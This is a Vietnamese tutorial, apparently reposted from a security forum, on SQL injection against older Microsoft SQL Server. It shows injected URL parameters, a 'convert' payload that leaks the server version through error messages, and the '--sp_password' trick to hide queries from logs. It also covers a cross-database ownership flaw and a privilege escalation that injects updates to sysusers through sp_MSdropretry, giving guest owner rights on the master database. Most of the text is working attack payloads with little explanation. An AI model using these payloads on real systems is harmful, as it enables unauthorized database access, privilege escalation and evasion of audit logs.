Anken - Tổng hợp về SQL Injection (bài 5) - Y!m: This_Love_No1
Tổng hợp về SQL Injection (bài 5)
PHẦN 3:
PHÁT HIỆN LỖI SQL-INJECTION
http://www.company.com/product/price.asp?id=1
select price from product where id=1
http://www.company.com/product/price.asp?id=1'
select price from product where id=1'
Unclosed quotation mark before the character string '
http://www.company.com/product/price.asp?id=[...]
KĨ THUẬT CONVERT-MAGIC
http://wwww.company.com/product/price.asp?id=1 and 1=convert(int,@@version) --sp_password
select price from product where id=1 and 1=convert(int,@@version)--sp_password
Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright © 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int.
'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.
• @@servername, db_name(), system_user, ...
• ' " ( )
LỖI CROSS-DATABASE CỦA MS-SQL
use testdatabase
create proc dbo.test as select * from master.dbo.sysxlogins
go
exec test
select * from master.dbo.sysxlogins
• sa == dbo
• db_owner có thể create & design các object của dbo
• SID của proc dbo.test == SID của master.dbo.sysxlogins
LỖI INJECTION CỦA MASTER..SP_MSDROPRETRY
CREATE PROCEDURE sp_MSdropretry
(@tname sysname, @pname sysname)
as
declare @retcode int
/*
** To public
*/
exec ('drop table ' + @tname)
if @@ERROR <> 0 return(1)
exec ('drop procedure ' + @pname)
if @@ERROR <> 0 return(1)
return (0)
NÂNG QUYỀN QUA MASTER..SP_MSDROPRETRY
exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'
exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'
exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx'
exec sp_executesql N'drop view dbo.test'
drop table xx update sysusers set sid=0x01 where name='dbo' drop procedure xx
drop table xx update dbo.test set sid=0x01,roles=0x01 where name=guest drop table xx
• guest == db_owner của database master
fantomas311(VNISS)
Bạn đang đọc truyện trên: truyentop.pro